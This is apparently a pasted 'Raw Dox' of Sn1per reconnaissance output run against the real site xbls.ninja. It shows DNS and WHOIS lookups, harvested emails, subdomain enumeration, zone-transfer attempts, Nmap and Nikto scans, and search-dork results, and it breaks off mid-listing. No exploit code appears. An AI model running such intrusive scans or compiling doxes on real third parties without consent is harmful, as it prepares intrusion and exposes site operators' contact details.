(Raw Dox) https://xbls.ninja/

1. root@kali:~/Desktop/Sn1per# sniper xbls.ninja
2. [ ok ] Starting postgresql (via systemctl): postgresql.service.
3. ____
4. _________ / _/___ ___ _____
5. / ___/ __ \ / // __ \/ _ \/ ___/
6. (__ ) / / // // /_/ / __/ /
7. /____/_/ /_/___/ .___/\___/_/
8. /_/
9.  
10. + -- --=[http://crowdshield.com
11. + -- --=[sniper v2.5 by 1N3
12.  
13. + -- ----------------------------=[Running Nslookup]=------------------------ -- +
14. Server: 83.255.255.2
15. Address: 83.255.255.2#53
16.  
17. Non-authoritative answer:
18. Name: xbls.ninja
19. Address: 104.27.134.184
20. Name: xbls.ninja
21. Address: 104.27.135.184
22.  
23. xbls.ninja has address 104.27.135.184
24. xbls.ninja has address 104.27.134.184
25. xbls.ninja mail is handled by 1 aspmx.l.google.com.
26. xbls.ninja mail is handled by 5 alt1.aspmx.l.google.com.
27. xbls.ninja mail is handled by 5 alt2.aspmx.l.google.com.
28. xbls.ninja mail is handled by 10 aspmx2.googlemail.com.
29. xbls.ninja mail is handled by 10 aspmx3.googlemail.com.
30. + -- ----------------------------=[Checking OS Fingerprint]=----------------- -- +
31.  
32. Xprobe2 v.0.3 Copyright (c) 2002-2005 fyodor@o0o.nu, ofir@sys-security.com, meder@o0o.nu
33.  
34. [+] Target is xbls.ninja
35. [+] Loading modules.
36. [+] Following modules are loaded:
37. [x] [1] ping:icmp_ping - ICMP echo discovery module
38. [x] [2] ping:tcp_ping - TCP-based ping discovery module
39. [x] [3] ping:udp_ping - UDP-based ping discovery module
40. [x] [4] infogather:ttl_calc - TCP and UDP based TTL distance calculation
41. [x] [5] infogather:portscan - TCP and UDP PortScanner
42. [x] [6] fingerprint:icmp_echo - ICMP Echo request fingerprinting module
43. [x] [7] fingerprint:icmp_tstamp - ICMP Timestamp request fingerprinting module
44. [x] [8] fingerprint:icmp_amask - ICMP Address mask request fingerprinting module
45. [x] [9] fingerprint:icmp_port_unreach - ICMP port unreachable fingerprinting module
46. [x] [10] fingerprint:tcp_hshake - TCP Handshake fingerprinting module
47. [x] [11] fingerprint:tcp_rst - TCP RST fingerprinting module
48. [x] [12] fingerprint:smb - SMB fingerprinting module
49. [x] [13] fingerprint:snmp - SNMPv2c fingerprinting module
50. [+] 13 modules registered
51. [+] Initializing scan engine
52. [+] Running scan engine
53. [-] ping:tcp_ping module: no closed/open TCP ports known on 104.27.134.184. Module test failed
54. [-] ping:udp_ping module: no closed/open UDP ports known on 104.27.134.184. Module test failed
55. [-] No distance calculation. 104.27.134.184 appears to be dead or no ports known
56. [+] Host: 104.27.134.184 is up (Guess probability: 50%)
57. [+] Target: 104.27.134.184 is alive. Round-Trip Time: 0.48672 sec
58. [+] Selected safe Round-Trip Time value is: 0.97344 sec
59. [-] fingerprint:tcp_hshake Module execution aborted (no open TCP ports known)
60. [-] fingerprint:smb need either TCP port 139 or 445 to run
61. [-] fingerprint:snmp: need UDP port 161 open
62. [+] Primary guess:
63. [+] Host 104.27.134.184 Running OS: PK'��U (Guess probability: 100%)
64. [+] Other guesses:
65. [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
66. [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
67. [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
68. [+] Host 104.27.134.184 Running OS: PK'��U (Guess probability: 100%)
69. [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
70. [+] Host 104.27.134.184 Running OS: PK'��U (Guess probability: 100%)
71. [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
72. [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
73. [+] Host 104.27.134.184 Running OS: (Guess probability: 100%)
74. [+] Cleaning up scan engine
75. [+] Modules deinitialized
76. [+] Execution completed.
77. + -- ----------------------------=[Gathering Whois Info]=-------------------- -- +
78. Domain Name: xbls.ninja
79. Registry Domain ID: 797cae8d831442179a21f2b418b0fa4e-RSIDE
80. Registrar WHOIS Server: whois.enom.com
81. Registrar URL: http://enom.com
82. Updated Date: 2017-01-10T22:21:50Z
83. Creation Date: 2014-12-30T00:54:43Z
84. Registry Expiry Date: 2017-12-30T00:54:43Z
85. Registrar: ENom Inc.
86. Registrar IANA ID: 48
87. Registrar Abuse Contact Email: bpoier@tucowsinc.com
88. Registrar Abuse Contact Phone: +42.55181929
89. Domain Status: clientTransferProhibited https://icann.org/epp#clientTransferProhibited
90. Registry Registrant ID: 150fa9836b784d08b150c601fb300044-RSIDE
91. Registrant Name: AnonymousSpeech AnonymousSpeech
92. Registrant Organization:
93. Registrant Street: 1-3-3 Sakura House
94. Registrant City: Tokyo
95. Registrant State/Province:
96. Registrant Postal Code: 164-0001
97. Registrant Country: JP
98. Registrant Phone: +81.9037462746
99. Registrant Phone Ext:
100. Registrant Fax:
101. Registrant Fax Ext:
102. Registrant Email: contact@anonymousspeech.com
103. Registry Admin ID: f710c5e40410441f8212b323ef4d1b5b-RSIDE
104. Admin Name: AnonyousSpeech AnonymousSpeech
105. Admin Organization: AnonymousSpeech
106. Admin Street: 1-3-3 Sakura House
107. Admin City: Tokyo
108. Admin State/Province: TOKYO
109. Admin Postal Code: 169-0072
110. Admin Country: JP
111. Admin Phone: +81.9037462746
112. Admin Phone Ext:
113. Admin Fax: +81.9037462746
114. Admin Fax Ext:
115. Admin Email: contact@anonymousspeech.com
116. Registry Tech ID: f710c5e40410441f8212b323ef4d1b5b-RSIDE
117. Tech Name: AnonyousSpeech AnonymousSpeech
118. Tech Organization: AnonymousSpeech
119. Tech Street: 1-3-3 Sakura House
120. Tech City: Tokyo
121. Tech State/Province: TOKYO
122. Tech Postal Code: 169-0072
123. Tech Country: JP
124. Tech Phone: +81.9037462746
125. Tech Phone Ext:
126. Tech Fax: +81.9037462746
127. Tech Fax Ext:
128. Tech Email: contact@anonymousspeech.com
129. Name Server: molly.ns.cloudflare.com
130. Name Server: chip.ns.cloudflare.com
131. DNSSEC: signedDelegation
132. URL of the ICANN Whois Inaccuracy Complaint Form: https://www.icann.org/wicf/
133. >>> Last update of WHOIS database: 2017-07-13T06:03:45Z <<<
134.  
135. For more information on Whois status codes, please visit https://icann.org/epp
136.  
137. Terms of Use: Users accessing the Rightside WHOIS service agree to use the data only for lawful purposes, and under no circumstances may this data be used to: Allow, enable, or otherwise support the transmission by e-mail, telephone, or facsimile of mass unsolicited, commercial advertising or solicitations to entities other than the registrar's own existing customers. Enable high volume, automated, electronic processes that send queries or data to the systems of Rightside or any ICANN-accredited registrar, except as reasonably necessary to register domain names or modify existing registrations. When using the Rightside Whois service, please consider the following: The Whois service is not a replacement for standard EPP commands to the SRS service. Whois is not considered authoritative for registered domain objects. The Whois service may be scheduled for downtime during production or OT&E maintenance periods. Queries to the Whois services are throttled. If too many queries are received from a single IP address within a specified time, the service will begin to reject further queries for a period of time to prevent disruption of Whois service access. Abuse of the Whois system through data mining is mitigated by detecting and limiting bulk query access from single sources.
138. + -- ----------------------------=[Gathering OSINT Info]=-------------------- -- +
139.  
140. *******************************************************************
141. * *
142. * | |_| |__ ___ /\ /\__ _ _ ____ _____ ___| |_ ___ _ __ *
143. * | __| '_ \ / _ \ / /_/ / _` | '__\ \ / / _ \/ __| __/ _ \ '__| *
144. * | |_| | | | __/ / __ / (_| | | \ V / __/\__ \ || __/ | *
145. * \__|_| |_|\___| \/ /_/ \__,_|_| \_/ \___||___/\__\___|_| *
146. * *
147. * TheHarvester Ver. 2.7 *
148. * Coded by Christian Martorella *
149. * Edge-Security Research *
150. * cmartorella@edge-security.com *
151. *******************************************************************
152.  
153.  
154. [-] Searching in Bing:
155. Searching 50 results...
156. Searching 100 results...
157.  
158.  
159. [+] Emails found:
160. ------------------
161. sikovit@xbls.ninja
162.  
163. [+] Hosts found in search engines:
164. ------------------------------------
165. [-] Resolving hostnames IPs...
166. 104.27.135.184:Chat.xbls.ninja
167. 104.27.135.184:chat.xbls.ninja
168. 209.141.39.114:irc.xbls.ninja
169. 209.141.39.114:primary.xbls.ninja
170. 69.162.67.141:status.xbls.ninja
171. 104.27.135.184:www.xbls.ninja
172. + -- ----------------------------=[Gathering DNS Info]=---------------------- -- +
173.  
174. ; <<>> DiG 9.10.3-P4-Debian <<>> -x xbls.ninja
175. ;; global options: +cmd
176. ;; Got answer:
177. ;; ->>HEADER<<- opcode: QUERY, status: NXDOMAIN, id: 44451
178. ;; flags: qr rd ra ad; QUERY: 1, ANSWER: 0, AUTHORITY: 1, ADDITIONAL: 1
179.  
180. ;; OPT PSEUDOSECTION:
181. ; EDNS: version: 0, flags:; udp: 4096
182. ;; QUESTION SECTION:
183. ;ninja.xbls.in-addr.arpa. IN PTR
184.  
185. ;; AUTHORITY SECTION:
186. in-addr.arpa. 3600 IN SOA b.in-addr-servers.arpa. nstld.iana.org. 2017042788 1800 900 604800 3600
187.  
188. ;; Query time: 1130 msec
189. ;; SERVER: 83.255.255.2#53(83.255.255.2)
190. ;; WHEN: Thu Jul 13 08:04:29 UTC 2017
191. ;; MSG SIZE rcvd: 120
192.  
193. dnsenum.pl VERSION:1.2.3
194.  
195. ----- xbls.ninja -----
196.  
197.  
198. Host's addresses:
199. __________________
200.  
201. xbls.ninja. 288 IN A 104.27.134.184
202. xbls.ninja. 288 IN A 104.27.135.184
203.  
204.  
205. Wildcard detection using: ntoedmyojsmp
206. _______________________________________
207.  
208. ntoedmyojsmp.xbls.ninja. 300 IN A 209.141.39.114
209.  
210.  
211. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
212.  
213. Wildcards detected, all subdomains will point to the same IP address
214. Omitting results containing 209.141.39.114.
215. Maybe you are using OpenDNS servers.
216.  
217. !!!!!!!!!!!!!!!!!!!!!!!!!!!!
218.  
219.  
220. Name Servers:
221. ______________
222.  
223. chip.ns.cloudflare.com. 86400 IN A 173.245.59.84
224. molly.ns.cloudflare.com. 86400 IN A 173.245.58.205
225.  
226.  
227. Mail (MX) Servers:
228. ___________________
229.  
230. aspmx2.googlemail.com. 293 IN A 108.177.97.26
231. alt2.aspmx.l.google.com. 293 IN A 74.125.28.26
232. aspmx.l.google.com. 293 IN A 64.233.164.26
233. aspmx3.googlemail.com. 293 IN A 74.125.28.26
234. alt1.aspmx.l.google.com. 293 IN A 108.177.97.26
235.  
236.  
237. Trying Zone Transfers and getting Bind Versions:
238. _________________________________________________
239.  
240.  
241. Trying Zone Transfer for xbls.ninja on chip.ns.cloudflare.com ...
242. AXFR record query failed: FORMERR
243.  
244. Trying Zone Transfer for xbls.ninja on molly.ns.cloudflare.com ...
245. AXFR record query failed: FORMERR
246.  
247. brute force file not specified, bay.
248. + -- ----------------------------=[Gathering DNS Subdomains]=---------------- -- +
249.  
250. ____ _ _ _ _ _____
251. / ___| _ _| |__ | (_)___| |_|___ / _ __
252. \___ \| | | | '_ \| | / __| __| |_ \| '__|
253. ___) | |_| | |_) | | \__ \ |_ ___) | |
254. |____/ \__,_|_.__/|_|_|___/\__|____/|_|
255.  
256. # Coded By Ahmed Aboul-Ela - @aboul3la
257.  
258. [-] Enumerating subdomains now for xbls.ninja
259. [-] verbosity is enabled, will show the subdomains results in realtime
260. [-] Searching now in Baidu..
261. [-] Searching now in Yahoo..
262. [-] Searching now in Google..
263. [-] Searching now in Bing..
264. [-] Searching now in Ask..
265. [-] Searching now in Netcraft..
266. [-] Searching now in DNSdumpster..
267. [-] Searching now in Virustotal..
268. [-] Searching now in ThreatCrowd..
269. [-] Searching now in SSL Certificates..
270. [-] Searching now in PassiveDNS..
271. Bing: chat.xbls.ninja
272. Bing: status.xbls.ninja
273. Virustotal: irc.xbls.ninja
274. Virustotal: status.xbls.ninja
275. Virustotal: chat.xbls.ninja
276. Virustotal: www.xbls.ninja
277. SSL Certificates: status.xbls.ninja
278. SSL Certificates: admin.xbls.ninja
279. SSL Certificates: chat.xbls.ninja
280. SSL Certificates: irc.xbls.ninja
281. SSL Certificates: mail.xbls.ninja
282. SSL Certificates: management.xbls.ninja
283. SSL Certificates: the.xbls.ninja
284. SSL Certificates: www.xbls.ninja
285. Yahoo: status.xbls.ninja
286. ThreatCrowd: the.xbls.ninja
287. PassiveDNS: secondary.xbls.ninja
288. PassiveDNS: tertiary.xbls.ninja
289. PassiveDNS: primary.xbls.ninja
290. PassiveDNS: irc.xbls.ninja
291. PassiveDNS: the.xbls.ninja
292. PassiveDNS: quaternary.xbls.ninja
293. DNSdumpster: quaternary.xbls.ninja
294. DNSdumpster: primary.xbls.ninja
295. DNSdumpster: chat.xbls.ninja
296. DNSdumpster: mail.xbls.ninja
297. DNSdumpster: secondary.xbls.ninja
298. DNSdumpster: tertiary.xbls.ninja
299. DNSdumpster: irc.xbls.ninja
300. Google: chat.xbls.ninja
301. [-] Saving results to file: /usr/share/sniper/loot/domains/domains-xbls.ninja.txt
302. [-] Total Unique Subdomains Found: 12
303. www.xbls.ninja
304. admin.xbls.ninja
305. chat.xbls.ninja
306. irc.xbls.ninja
307. mail.xbls.ninja
308. management.xbls.ninja
309. primary.xbls.ninja
310. quaternary.xbls.ninja
311. secondary.xbls.ninja
312. status.xbls.ninja
313. tertiary.xbls.ninja
314. the.xbls.ninja
315.  
316. ╔═╗╦═╗╔╦╗╔═╗╦ ╦
317. ║ ╠╦╝ ║ ╚═╗╠═╣
318. ╚═╝╩╚═ ╩o╚═╝╩ ╩
319. + -- ----------------------------=[Gathering Certificate Subdomains]=-------- -- +
320.  
321. admin.xbls.ninja
322. chat.xbls.ninja
323. irc.xbls.ninja
324. mail.xbls.ninja
325. management.xbls.ninja
326. status.xbls.ninja
327. the.xbls.ninja
328. www.xbls.ninja
329. *.xbls.ninja
330. [+] Domains saved to: /usr/share/sniper/loot/domains/domains-xbls.ninja-full.txt
331.  
332. + -- ----------------------------=[Checking for Sub-Domain Hijacking]=------- -- +
333. + -- ----------------------------=[Checking Email Security]=----------------- -- +
334.  
335. + -- ----------------------------=[Pinging host]=---------------------------- -- +
336. PING xbls.ninja (104.27.134.184) 56(84) bytes of data.
337. 64 bytes from 104.27.134.184: icmp_seq=1 ttl=58 time=10.9 ms
338.  
339. --- xbls.ninja ping statistics ---
340. 1 packets transmitted, 1 received, 0% packet loss, time 0ms
341. rtt min/avg/max/mdev = 10.984/10.984/10.984/0.000 ms
342.  
343. + -- ----------------------------=[Running TCP port scan]=------------------- -- +
344.  
345. Starting Nmap 7.50 ( https://nmap.org ) at 2017-07-13 08:05 UTC
346. Warning: 104.27.135.184 giving up on port because retransmission cap hit (2).
347. Nmap scan report for xbls.ninja (104.27.135.184)
348. Host is up (0.014s latency).
349. Other addresses for xbls.ninja (not scanned): 104.27.134.184
350. Not shown: 45 filtered ports
351. Some closed ports may be reported as filtered due to --defeat-rst-ratelimit
352. PORT STATE SERVICE
353. 80/tcp open http
354. 443/tcp open https
355. 8080/tcp open http-proxy
356. 8443/tcp open https-alt
357.  
358. Nmap done: 1 IP address (1 host up) scanned in 3.68 seconds
359.  
360. + -- ----------------------------=[Running Intrusive Scans]=----------------- -- +
361. + -- --=[Port 21 closed... skipping.
362. + -- --=[Port 22 closed... skipping.
363. + -- --=[Port 23 closed... skipping.
364. + -- --=[Port 25 closed... skipping.
365. + -- --=[Port 53 closed... skipping.
366. + -- --=[Port 79 closed... skipping.
367. + -- --=[Port 80 opened... running tests...
368. + -- ----------------------------=[Checking for WAF]=------------------------ -- +
369.  
370. ^ ^
371. _ __ _ ____ _ __ _ _ ____
372. ///7/ /.' \ / __////7/ /,' \ ,' \ / __/
373. | V V // o // _/ | V V // 0 // 0 // _/
374. |_n_,'/_n_//_/ |_n_,' \_,' \_,'/_/
375. <
376. ...'
377.  
378. WAFW00F - Web Application Firewall Detection Tool
379.  
380. By Sandro Gauci && Wendel G. Henrique
381.  
382. Checking http://xbls.ninja
383. The site http://xbls.ninja is behind a CloudFlare
384. Number of requests: 1
385.  
386. + -- ----------------------------=[Gathering HTTP Info]=--------------------- -- +
387. http://xbls.ninja [301 Moved Permanently] CloudFlare, Cookies[__cfduid], Country[UNITED STATES][US], HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.27.134.184], RedirectLocation[https://xbls.ninja/], Strict-Transport-Security[max-age=31536000], Title[301 Moved Permanently], UncommonHeaders[x-content-type-options,x-sucuri-id,cf-ray], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]
388. https://xbls.ninja/ [403 Forbidden] CloudFlare, Cookies[__cfduid], Country[UNITED STATES][US], HTML5, HTTPServer[cloudflare-nginx], HttpOnly[__cfduid], IP[104.27.134.184], Strict-Transport-Security[max-age=15552000], Title[Sucuri WebSite Firewall - Access Denied], UncommonHeaders[x-content-type-options,x-sucuri-id,cf-ray], X-Frame-Options[SAMEORIGIN], X-XSS-Protection[1; mode=block]
389.  
390. __ ______ _____
391. \ \/ / ___|_ _|
392. \ /\___ \ | |
393. / \ ___) || |
394. /_/\_|____/ |_|
395.  
396. + -- --=[Cross-Site Tracer v1.3 by 1N3 @ CrowdShield
397. + -- --=[Target: xbls.ninja:80
398. + -- --=[Site not vulnerable to Cross-Site Tracing!
399. + -- --=[Site not vulnerable to Host Header Injection!
400. + -- --=[Site not vulnerable to Cross-Frame Scripting!
401. + -- --=[Site not vulnerable to Clickjacking!
402.  
403. HTTP/1.1 405 Not Allowed
404. Date: Thu, 13 Jul 2017 06:05:57 GMT
405. Content-Type: text/html
406. Content-Length: 177
407. Connection: close
408. Server: -nginx
409. CF-RAY: -
410.  
411. <html>
412. <head><title>405 Not Allowed</title></head>
413. <body bgcolor="white">
414. <center><h1>405 Not Allowed</h1></center>
415. <hr><center>cloudflare-nginx</center>
416. </body>
417. </html>
418.  
419. HTTP/1.1 301 Moved Permanently
420. Date: Thu, 13 Jul 2017 06:05:57 GMT
421. Content-Type: text/html
422. Transfer-Encoding: chunked
423. Connection: keep-alive
424. Set-Cookie: __cfduid=dd9b74b5afcbd656c7239f6e41a05baba1499925957; expires=Fri, 13-Jul-18 06:05:57 GMT; path=/; domain=.xbls.ninja; HttpOnly
425. Location: https://xbls.ninja/
426. X-XSS-Protection: 1; mode=block
427. X-Frame-Options: SAMEORIGIN
428. X-Content-Type-Options: nosniff
429. Strict-Transport-Security: max-age=31536000
430. X-Sucuri-ID: 15015
431. Server: cloudflare-nginx
432. CF-RAY: 37da0db273698637-ARN
433.  
434. aa
435. <html>
436. <head><title>301 Moved Permanently</title></head>
437. <body bgcolor="white">
438. <center><h1>301 Moved Permanently</h1></center>
439. <hr><center>nginx</center>
440. </body>
441. </html>
442.  
443.  
444.  
445.  
446. + -- ----------------------------=[Checking HTTP Headers]=------------------- -- +
447. + -- --=[Checking if X-Content options are enabled on xbls.ninja...
448. X-Content-Type-Options: nosniff
449.  
450. + -- --=[Checking if X-Frame options are enabled on xbls.ninja...
451. X-Frame-Options: SAMEORIGIN
452.  
453. + -- --=[Checking if X-XSS-Protection header is enabled on xbls.ninja...
454. X-XSS-Protection: 1; mode=block
455.  
456. + -- --=[Checking HTTP methods on xbls.ninja...
457.  
458. + -- --=[Checking if TRACE method is enabled on xbls.ninja...
459.  
460. + -- --=[Checking for META tags on xbls.ninja...
461.  
462. + -- --=[Checking for open proxy on xbls.ninja...
463.  
464. + -- --=[Enumerating software on xbls.ninja...
465. Server: cloudflare-nginx
466.  
467. + -- --=[Checking if Strict-Transport-Security is enabled on xbls.ninja...
468. Strict-Transport-Security: max-age=31536000
469.  
470. + -- --=[Checking for Flash cross-domain policy on xbls.ninja...
471. <html>
472. <head><title>301 Moved Permanently</title></head>
473. <body bgcolor="white">
474. <center><h1>301 Moved Permanently</h1></center>
475. <hr><center>nginx</center>
476. </body>
477. </html>
478.  
479. + -- --=[Checking for Silverlight cross-domain policy on xbls.ninja...
480. <html>
481. <head><title>301 Moved Permanently</title></head>
482. <body bgcolor="white">
483. <center><h1>301 Moved Permanently</h1></center>
484. <hr><center>nginx</center>
485. </body>
486. </html>
487.  
488. + -- --=[Checking for HTML5 cross-origin resource sharing on xbls.ninja...
489.  
490. + -- --=[Retrieving robots.txt on xbls.ninja...
491. <html>
492. <head><title>301 Moved Permanently</title></head>
493. <body bgcolor="white">
494. <center><h1>301 Moved Permanently</h1></center>
495. <hr><center>nginx</center>
496. </body>
497. </html>
498.  
499. + -- --=[Retrieving sitemap.xml on xbls.ninja...
500. <html>
501. <head><title>301 Moved Permanently</title></head>
502. <body bgcolor="white">
503. <center><h1>301 Moved Permanently</h1></center>
504. <hr><center>nginx</center>
505. </body>
506. </html>
507.  
508. + -- --=[Checking cookie attributes on xbls.ninja...
509. Set-Cookie: __cfduid=d7e294dee909b879e0b542758bc0daedd1499925959; expires=Fri, 13-Jul-18 06:05:59 GMT; path=/; domain=.xbls.ninja; HttpOnly
510.  
511. + -- --=[Checking for ASP.NET Detailed Errors on xbls.ninja...
512. <body class="error404 wpb-js-composer js-comp-ver-5.1.1 vc_responsive">
513. <h1 class="aligncenter">Error 404 - Not Found</h1>
514.  
515.  
516. + -- ----------------------------=[Running Web Vulnerability Scan]=---------- -- +
517. - Nikto v2.1.6
518. ---------------------------------------------------------------------------
519. + Target IP: 104.27.135.184
520. + Target Hostname: xbls.ninja
521. + Target Port: 80
522. + Start Time: 2017-07-13 08:05:27 (GMT0)
523. ---------------------------------------------------------------------------
524. + Server: cloudflare-nginx
525. + The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
526. + Uncommon header 'cf-ray' found, with contents: 37da0dc8c1eb865b-ARN
527. + All CGI directories 'found', use '-C none' to test none
528. + Server banner has changed from 'cloudflare-nginx' to '-nginx' which may suggest a WAF, load balancer or proxy is in place
529. + 26097 requests: 0 error(s) and 2 item(s) reported on remote host
530. + End Time: 2017-07-13 08:13:31 (GMT0) (484 seconds)
531. ---------------------------------------------------------------------------
532. + 1 host(s) tested
533. + -- ----------------------------=[Saving Web Screenshots]=------------------ -- +
534. [+] Screenshot saved to /usr/share/sniper/loot/screenshots/xbls.ninja-port80.jpg
535. QNetworkReplyImplPrivate::error: Internal problem, this method must only be called once.
536. content-type missing in HTTP POST, defaulting to application/x-www-form-urlencoded. Use QNetworkRequest::setHeader() to fix this problem.
537. + -- ----------------------------=[Running Google Hacking Queries]=--------------------- -- +
538. + -- ----------------------------=[Running InUrlBR OSINT Queries]=---------- -- +
539.  
540. _____ .701F. .iBR. .7CL. .70BR. .7BR. .7BR'''Cq. .70BR. .1BR'''Yp, .8BR'''Cq.
541. (_____) 01 01N. C 01 C 01 .01. 01 01 Yb 01 .01.
542. (() ()) 01 C YCb C 01 C 01 ,C9 01 01 dP 01 ,C9
543. \ / 01 C .CN. C 01 C 0101dC9 01 01'''bg. 0101dC9
544. \ / 01 C .01.C 01 C 01 YC. 01 , 01 .Y 01 YC.
545. /=\ 01 C Y01 YC. ,C 01 .Cb. 01 ,C 01 ,9 01 .Cb.
546. [___] .J01L. .JCL. YC .b0101d'. .J01L. .J01. .J01010101C .J0101Cd9 .J01L. .J01./ 2.1
547.  
548. __[ ! ] Neither war between hackers, nor peace for the system.
549. __[ ! ] http://blog.inurl.com.br
550. __[ ! ] http://fb.com/InurlBrasil
551. __[ ! ] http://twitter.com/@googleinurl
552. __[ ! ] http://github.com/googleinurl
553. __[ ! ] Current PHP version::[ 7.0.20-2 ]
554. __[ ! ] Current script owner::[ root ]
555. __[ ! ] Current uname::[ Linux kali 4.9.0-kali3-amd64 #1 SMP Debian 4.9.18-1kali1 (2017-04-04) x86_64 ]
556. __[ ! ] Current pwd::[ /usr/share/sniper ]
557. __[ ! ] Help: php inurlbr.php --help
558. ------------------------------------------------------------------------------------------------------------------------
559.  
560. [ ! ] Starting SCANNER INURLBR 2.1 at [13-07-2017 08:14:16]
561. [ ! ] legal disclaimer: Usage of INURLBR for attacking targets without prior mutual consent is illegal.
562. It is the end user's responsibility to obey all applicable local, state and federal laws.
563. Developers assume no liability and are not responsible for any misuse or damage caused by this program
564.  
565. [ INFO ][ OUTPUT FILE ]:: [ /usr/share/sniper/output/inurlbr-xbls.ninja.txt ]
566. [ INFO ][ DORK ]::[ site:xbls.ninja ]
567. [ INFO ][ SEARCHING ]:: {
568. [ INFO ][ ENGINE ]::[ GOOGLE - www.google.ws ]
569.  
570. [ INFO ][ SEARCHING ]::
571. -[:::]
572. [ INFO ][ ENGINE ]::[ GOOGLE API ]
573.  
574. [ INFO ][ SEARCHING ]::
575. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
576. [ INFO ][ ENGINE ]::[ GOOGLE_GENERIC_RANDOM - www.google.com.tn ID: 010479943387663786936:wjwf2xkhfmq ]
577.  
578. [ INFO ][ SEARCHING ]::
579. -[:::]-[:::]-[:::]-[:::]-[:::]-[:::]
580.  
581. [ INFO ][ TOTAL FOUND VALUES ]:: [ 19 ]
582.  
583.  
584. _[ - ]::--------------------------------------------------------------------------------------------------------------
585. |_[ + ] [ 0 / 19 ]-[08:14:26] [ - ]
586. |_[ + ] Target:: [ https://xbls.ninja/ ]
587. |_[ + ] Exploit::
588. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
589. |_[ + ] More details:: / - / , ISP:
590. |_[ + ] Found:: UNIDENTIFIED
591.  
592. _[ - ]::--------------------------------------------------------------------------------------------------------------
593. |_[ + ] [ 1 / 19 ]-[08:14:27] [ - ]
594. |_[ + ] Target:: [ https://xbls.ninja/privacy/ ]
595. |_[ + ] Exploit::
596. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
597. |_[ + ] More details:: / - / , ISP:
598. |_[ + ] Found:: UNIDENTIFIED
599.  
600. _[ - ]::--------------------------------------------------------------------------------------------------------------
601. |_[ + ] [ 2 / 19 ]-[08:14:28] [ - ]
602. |_[ + ] Target:: [ https://xbls.ninja/terms/ ]
603. |_[ + ] Exploit::
604. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
605. |_[ + ] More details:: / - / , ISP:
606. |_[ + ] Found:: UNIDENTIFIED
607.  
608. _[ - ]::--------------------------------------------------------------------------------------------------------------
609. |_[ + ] [ 3 / 19 ]-[08:14:29] [ - ]
610. |_[ + ] Target:: [ https://xbls.ninja/account/ ]
611. |_[ + ] Exploit::
612. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
613. |_[ + ] More details:: / - / , ISP:
614. |_[ + ] Found:: UNIDENTIFIED
615.  
616. _[ - ]::--------------------------------------------------------------------------------------------------------------
617. |_[ + ] [ 4 / 19 ]-[08:14:29] [ - ]
618. |_[ + ] Target:: [ https://xbls.ninja/contact/ ]
619. |_[ + ] Exploit::
620. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
621. |_[ + ] More details:: / - / , ISP:
622. |_[ + ] Found:: UNIDENTIFIED
623.  
624. _[ - ]::--------------------------------------------------------------------------------------------------------------
625. |_[ + ] [ 5 / 19 ]-[08:14:30] [ - ]
626. |_[ + ] Target:: [ https://xbls.ninja/buy-steam ]
627. |_[ + ] Exploit::
628. |_[ + ] Information Server:: HTTP/1.1 302 Moved Temporarily, Server: cloudflare-nginx , IP:104.27.135.184:443
629. |_[ + ] More details:: / - / , ISP:
630. |_[ + ] Found:: UNIDENTIFIED
631.  
632. _[ - ]::--------------------------------------------------------------------------------------------------------------
633. |_[ + ] [ 6 / 19 ]-[08:14:30] [ - ]
634. |_[ + ] Target:: [ https://xbls.ninja/browse/ ]
635. |_[ + ] Exploit::
636. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
637. |_[ + ] More details:: / - / , ISP:
638. |_[ + ] Found:: UNIDENTIFIED
639.  
640. _[ - ]::--------------------------------------------------------------------------------------------------------------
641. |_[ + ] [ 7 / 19 ]-[08:14:30] [ - ]
642. |_[ + ] Target:: [ https://xbls.ninja/returns-and-refunds/ ]
643. |_[ + ] Exploit::
644. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
645. |_[ + ] More details:: / - / , ISP:
646. |_[ + ] Found:: UNIDENTIFIED
647.  
648. _[ - ]::--------------------------------------------------------------------------------------------------------------
649. |_[ + ] [ 8 / 19 ]-[08:14:31] [ - ]
650. |_[ + ] Target:: [ https://xbls.ninja/product-category/ninja-tokens/ ]
651. |_[ + ] Exploit::
652. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
653. |_[ + ] More details:: / - / , ISP:
654. |_[ + ] Found:: UNIDENTIFIED
655.  
656. _[ - ]::--------------------------------------------------------------------------------------------------------------
657. |_[ + ] [ 9 / 19 ]-[08:14:32] [ - ]
658. |_[ + ] Target:: [ https://xbls.ninja/category/uncategorized/ ]
659. |_[ + ] Exploit::
660. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
661. |_[ + ] More details:: / - / , ISP:
662. |_[ + ] Found:: UNIDENTIFIED
663.  
664. _[ - ]::--------------------------------------------------------------------------------------------------------------
665. |_[ + ] [ 10 / 19 ]-[08:14:33] [ - ]
666. |_[ + ] Target:: [ https://xbls.ninja/product/ninja-token-1-week/ ]
667. |_[ + ] Exploit::
668. |_[ + ] Information Server:: HTTP/1.1 200 OK, Server: cloudflare-nginx , IP:104.27.135.184:443
669. |_[ + ] More details:: / - / , ISP:
670. |_[ + ] Found:: UNIDENTIFIED
671.  
672. _[ - ]::--------------------------------------------------------------------------------------------------------------
673. |_[ + ] [ 11 / 19 ]-[08:14:34] [ - ]
